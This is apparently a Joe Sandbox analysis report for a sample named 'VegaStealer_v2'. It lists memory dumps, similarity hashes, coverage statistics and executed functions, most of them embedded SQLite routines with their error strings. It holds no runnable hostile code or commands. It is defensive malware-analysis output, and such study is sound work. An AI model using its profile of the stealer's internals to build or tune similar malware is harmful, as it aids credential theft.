Source File: 00000005.00000002.2044084092.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2043999955.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2044107105.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2044139172.0000000000403000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2044139172.0000000000408000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2044216641.0000000000411000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2045917495.0000000000BC0000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_VegaStealer_v2.jbxd

Similarity

API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
String ID: 0$WinClass32
API String ID: 282685165-2329282442
Opcode ID: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
Instruction ID: db64ee9f6a3c3da8bd2a7b60d0102d68ead382408d30bf1f106ff4c9428f50ce
Opcode Fuzzy Hash: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
Instruction Fuzzy Hash: F7213C70D44248AAEF11DFD0CD46BDDBFB8AB04708F20802AF600BA1E5D7B966459B5C

Analysis Process: v2.exePID: 5316, Parent PID: 3252COMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	11.8%
Signature Coverage:	0.9%
Total number of Nodes:	964
Total number of Limit Nodes:	123

Executed Functions

Function 6BC85D80 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 651COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC85EA2
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC85F4D
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC85FE3
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC85FEC
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC86116
_memset.LIBCMT ref: 6BC8617B

Strings

:memory:, xrefs: 6BC85DD5

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.$_memset
String ID: :memory:
API String ID: 1480580083-2920599690
Opcode ID: 52d2ab81efffb31b503afa73474db52af4e1c5b2d02127ee93bb1e4996dea6ac
Instruction ID: 6916b221dc6f0f0e6146cd8bb43637fe656a1668a6151ec6c66a32a90905ee32
Opcode Fuzzy Hash: 52d2ab81efffb31b503afa73474db52af4e1c5b2d02127ee93bb1e4996dea6ac
Instruction Fuzzy Hash: CA32C4B0A297419FE701CF28C88171ABBE1BF8530CF0445B9E9599B242F77DDA45CB92

Function 052BCF8A Relevance: 4.5, APIs: 1, Strings: 1, Instructions: 998COMMON

Download Yara Rule

APIs

SI6039a77d8b3fe4a1.SQLITE.INTEROP ref: 052BDC80

Strings

LR]q, xrefs: 052BDC0C

Memory Dump Source

Source File: 00000007.00000002.2184837156.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_52b0000_v2.jbxd

Similarity

API ID: I6039a77d8b3fe4a1.
String ID: LR]q
API String ID: 3315335696-3081347316
Opcode ID: 3f98482f4a6627c81142d175759724a5271d2e3453c5d4c7b997f953bce02c58
Instruction ID: 0d6f627a3c1813a681589a20810d10156a8cae4ec41f9301c327289acbfd8105
Opcode Fuzzy Hash: 3f98482f4a6627c81142d175759724a5271d2e3453c5d4c7b997f953bce02c58
Instruction Fuzzy Hash: 1D925A31A205568FDB10DF58C4C4BADB7B2FF84300F19CA69D4599B64AC779EC82CB94

Function 6BC6F1A0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(6BD1A0BC,?,6BC6F6C5,?,?,6BCC5767), ref: 6BC6F1D5

Part of subcall function 6BC55FF0: SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000062A9,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,?,6BC6F1E7,6BD15CA8,00000001,?,6BC6F6C5,?,?,6BCC5767), ref: 6BC5601F

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.InfoSystem
String ID:
API String ID: 4045177776-0
Opcode ID: 661395a425f8f2c6590b2d8329beff0bf02331da9dd1d339b140f0373d7978b5
Instruction ID: 2616bfe662f5192767f861b9fbd8d58c490a0ead5810e50d205ddd7f0daeb3df
Opcode Fuzzy Hash: 661395a425f8f2c6590b2d8329beff0bf02331da9dd1d339b140f0373d7978b5
Instruction Fuzzy Hash: 310162B18192009EFF40CF749D07710BAE9B706319F90017AF229DE288F73D911D8B25

Function 012EE1E8 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2162251699.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_12ed000_v2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c1cf3d327d68f2473b541de04f011dc7bd90428a7a8c60d7e054c326a09403f
Instruction ID: 4b2e8c7c1e6ce55dd49597459d8087b4df20762881c4275f9ddc983fdb6642d7
Opcode Fuzzy Hash: 4c1cf3d327d68f2473b541de04f011dc7bd90428a7a8c60d7e054c326a09403f
Instruction Fuzzy Hash: 87913F7585A3C18FD7438B74E8562963FF0AF13321B5E41EBD844CF0A3E269485ACB62

Function 02CCC1E8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2163193742.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2cc0000_v2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6718debf91c391b8758a17abb510c112d02292b5e95f1845b256c3b5c934566
Instruction ID: d988237c62d0228f55557455d95875d917b8d9ae336cd04db860c605c7e0da58
Opcode Fuzzy Hash: b6718debf91c391b8758a17abb510c112d02292b5e95f1845b256c3b5c934566
Instruction Fuzzy Hash: FB1102B9B002248FCB88EB79E1516AA77F3EBC82567604669C109CB358DA3599439F80

Function 6BCDCE00 Relevance: 26.6, APIs: 7, Strings: 8, Instructions: 400
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AFB6,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,6742C603,?), ref: 6BCDCE33
_memset.LIBCMT ref: 6BCDCEF4
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BCDCF44
SIccd01f4d70f48acf.SQLITE.INTEROP(00000000), ref: 6BCDD2C2

Strings

NOCASE, xrefs: 6BCDD072
BINARY, xrefs: 6BCDD016, 6BCDD046, 6BCDD05C
%s at line %d of [%.10s], xrefs: 6BCDCE2C
RTRIM, xrefs: 6BCDD088
v, xrefs: 6BCDD1F5
main, xrefs: 6BCDD1D0
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCDCE1D
misuse, xrefs: 6BCDCE27

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.Iaa0f8e0c251cfd1d.Iccd01f4d70f48acf._memset
String ID: %s at line %d of [%.10s]$BINARY$NOCASE$RTRIM$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$main$misuse$v
API String ID: 3155288359-813848819
Opcode ID: e92fcbdf5084e4b0c5c5994892140e89799fa79b82c6d99bf58857fd694492ee
Instruction ID: d02464fa4da7f2dfbd9154c9a21562cbc57f46a2231aa15538030b81e8f7ee78
Opcode Fuzzy Hash: e92fcbdf5084e4b0c5c5994892140e89799fa79b82c6d99bf58857fd694492ee
Instruction Fuzzy Hash: 6CE124B5D253019BEB00CF64C882B4B3BA4AF45718F0445A9EE199F346F73DDA15CBA2

Function 6BC82770 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 486
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 6BC82887
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?,00000001,00000000,?,?,?,?,?,?,6BC86215), ref: 6BC82ACB
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?,00000001,00000000), ref: 6BC82CBE

Strings

-journal, xrefs: 6BC82A6E
nolock, xrefs: 6BC82B8C
immutable, xrefs: 6BC82BAD

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.$_memset
String ID: -journal$immutable$nolock
API String ID: 1480580083-4201244970
Opcode ID: 001026d0e44b4ab091d5a4c48c7e1371ddb8119533712eaadfa043d1c69a6767
Instruction ID: 4403868363b17ad47b5ed51f1c2396e0714f5cac94915a63108bb99d02b2fbbd
Opcode Fuzzy Hash: 001026d0e44b4ab091d5a4c48c7e1371ddb8119533712eaadfa043d1c69a6767
Instruction Fuzzy Hash: 5F02D8B1E116169BDB04CF68C894BEABBB5BF44318F048169D8689B341F739EA05CBD1

Function 6BCC1340 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 479COMMON

Download Yara Rule

APIs

SIc14fb8a21feb2e94.SQLITE.INTEROP(6BC8DA3D,00000000,Function_000E6B00,?,00000000,6BC8DA3D,SELECT*FROM"%w".%s ORDER BY rowid,?,?), ref: 6BCC1867

Strings

sqlite_temp_master, xrefs: 6BCC138C
table, xrefs: 6BCC137F
unsupported file format, xrefs: 6BCC17D7
sqlite_master, xrefs: 6BCC1397
attached databases must use the same text encoding as main database, xrefs: 6BCC1727
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6BCC183C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Ic14fb8a21feb2e94.
String ID: SELECT*FROM"%w".%s ORDER BY rowid$attached databases must use the same text encoding as main database$sqlite_master$sqlite_temp_master$table$unsupported file format
API String ID: 3249223497-2450480176
Opcode ID: 0f1851fdd5529d18e884a4743cabd659f355194d3b20add806cec4d7874c08c5
Instruction ID: 7342e266d0a3b618637c184df3f4b5484303699f48b9f4fb748f02166fcbb616
Opcode Fuzzy Hash: 0f1851fdd5529d18e884a4743cabd659f355194d3b20add806cec4d7874c08c5
Instruction Fuzzy Hash: 2D128F70A297518FD700CF2AC08071BBBE1BF95318F14899DE8998B351E779EA45CB93

Function 6BCC0600 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,API called with finalized prepared statement,00000000,00000000,6BC8DA3D,?,6BC99755,?,?,?,?,?,6BC8DA3D,00000000,?), ref: 6BCC062D
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0001590B,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,6BC8DA3D,?,6BC99755,?,?,?,?,?,6BC8DA3D,00000000), ref: 6BCC064B

Strings

%s at line %d of [%.10s], xrefs: 6BCC0644
API called with NULL prepared statement, xrefs: 6BCC0615
API called with finalized prepared statement, xrefs: 6BCC0626
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCC0635
misuse, xrefs: 6BCC063F

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-4004311192
Opcode ID: a01919684782cfde8c6f61046c37ccda4ffa0c6b6a8b3a0728195cb47e3cc54d
Instruction ID: ee943197d1fa4f14b20b7573a65a2444d7c6d1e7c485dbcd45e6cbb5a6f00327
Opcode Fuzzy Hash: a01919684782cfde8c6f61046c37ccda4ffa0c6b6a8b3a0728195cb47e3cc54d
Instruction Fuzzy Hash: D631C5B1A287019BE300DF79AC41A5B73E4ABD5228F000579E959DB342FB2DDA0587E3

Function 6BC97B50 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,API called with finalized prepared statement,?,6BC8DA3D,6BC8DAE9,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF,00000000,00000000,6BC8DA3D,?,6BC8DA3D), ref: 6BC97B71
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0001565C,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000015,API called with finalized prepared statement,?,6BC8DA3D,6BC8DAE9,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF), ref: 6BC97B8C

Strings

%s at line %d of [%.10s], xrefs: 6BC97B85
API called with finalized prepared statement, xrefs: 6BC97B6A
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC97B76
misuse, xrefs: 6BC97B80

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-170423033
Opcode ID: 3fd4ef4d6329ed295dac206f87a22826c6ba00b3c0c984908bcf26364fa5cb14
Instruction ID: f5dfb29401c886de9b0595d6fffaa3d944822f42aeb9bad3440d3dd1e5c3bcb7
Opcode Fuzzy Hash: 3fd4ef4d6329ed295dac206f87a22826c6ba00b3c0c984908bcf26364fa5cb14
Instruction Fuzzy Hash: B1117232B266149BFB10AEB8FC81B4A77549B40669F044077EA0CDB241EB79DA4453E1

Function 6BC52A40 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AA59,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,00000000,00000001,?,?,6BC57E70,?,?,?,?,?), ref: 6BC52C6B

Strings

%s at line %d of [%.10s], xrefs: 6BC52C64
unable to delete/modify user-function due to active statements, xrefs: 6BC52BA5
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC52C55
misuse, xrefs: 6BC52C5F

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse$unable to delete/modify user-function due to active statements
API String ID: 2981141233-207740414
Opcode ID: edc5cfa6ef244e1eb16933ecb74dd248f8886dad58de2819396c0843ef8d3f1f
Instruction ID: c01a656a1e4700233722e4cb76af67fff94d7b4ff319ec33e3af6b25a5a76577
Opcode Fuzzy Hash: edc5cfa6ef244e1eb16933ecb74dd248f8886dad58de2819396c0843ef8d3f1f
Instruction Fuzzy Hash: 6761E872B112049BEB14CE19CC90FEB37E9EB88354F058169FC59DB241E738E961CBA4

Function 6BC67F20 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,?,?,?), ref: 6BC68001

Part of subcall function 6BC60AD0: SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000113C6,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000074,00000000,?,?,?,?), ref: 6BC60AF8

Strings

%s at line %d of [%.10s], xrefs: 6BC680D8
database corruption, xrefs: 6BC680D3
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC680C9

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.Iaa0f8e0c251cfd1d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2544783548-2469029621
Opcode ID: a43057f4406ec8d9ab473f00df2f46283c9f4219bfec2b9d65c3b3397dfb9c56
Instruction ID: 3827300a5a54328787a508a669a9e4d8f87479ee5e1f166832ad2be7dfb41c58
Opcode Fuzzy Hash: a43057f4406ec8d9ab473f00df2f46283c9f4219bfec2b9d65c3b3397dfb9c56
Instruction Fuzzy Hash: 2C51E4316187408FD320CF689480F26BBE0EF45314F1449AEE9998B752F36BE945C7A2

Function 6BC57D70 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AAD8,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,?,6BC612CB,tointeger,00000001,00200801,00000000,6BC47D30), ref: 6BC57DA2

Strings

%s at line %d of [%.10s], xrefs: 6BC57D9B
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57D8C
misuse, xrefs: 6BC57D96

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: eb4a1353b91050f35c2fcd2a863d227731fb6343a8c215b58e8fbe03128cecec
Instruction ID: fd2a8109820027cff8b90d34a1bfb66e66d7f0d31007216a0b39269aec7ff673
Opcode Fuzzy Hash: eb4a1353b91050f35c2fcd2a863d227731fb6343a8c215b58e8fbe03128cecec
Instruction Fuzzy Hash: 4441E2B2A102059FEB00CF68D846E5B73A8AF49718F008165FD1DD7200F738DEB187A6

Function 6BC60AD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000113C6,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000074,00000000,?,?,?,?), ref: 6BC60AF8
SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000113DB,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC60BB4

Strings

%s at line %d of [%.10s], xrefs: 6BC60AF1, 6BC60BAD
database corruption, xrefs: 6BC60AEC, 6BC60BA8
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC60AE2, 6BC60B9E

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: b14964b9ba2fb4670efabba33fe3858569cbeb8f102fd5615b1a76aa4336fe98
Instruction ID: d6b67ff92c0d4cd70b113b1719ddc74f81416fa4b931fbe00278794a6ad999db
Opcode Fuzzy Hash: b14964b9ba2fb4670efabba33fe3858569cbeb8f102fd5615b1a76aa4336fe98
Instruction Fuzzy Hash: 2F31A131A252109FC300DF28C8C1E567BA6AB81764F4A80D9ED58AF352F775EE85C7A1

Function 6BCD6360 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SIdb45e174afb28e2c.SQLITE.INTEROP(?), ref: 6BCD63D2
